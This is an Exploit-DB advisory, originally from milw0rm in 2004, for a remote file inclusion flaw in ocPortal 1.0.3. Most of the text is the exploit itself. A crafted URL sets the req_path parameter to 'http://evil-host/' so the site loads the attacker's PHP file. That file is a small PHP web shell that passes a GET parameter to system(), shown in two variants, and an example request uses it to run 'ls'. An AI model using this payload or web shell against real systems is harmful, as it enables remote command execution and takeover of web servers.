ocPortal 1.0.3 - Remote File Inclusion

EDB-ID:

574


Author:

Exoduks

Type:

webapps


Platform:

PHP

Date:

2004-10-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



   <?php

     $com = $_GET["com"];

     system ("$com");

   ?>



  Example of funcs.php if your host support php.



   <?php

     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

   ?>



  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls


# milw0rm.com [2004-10-13]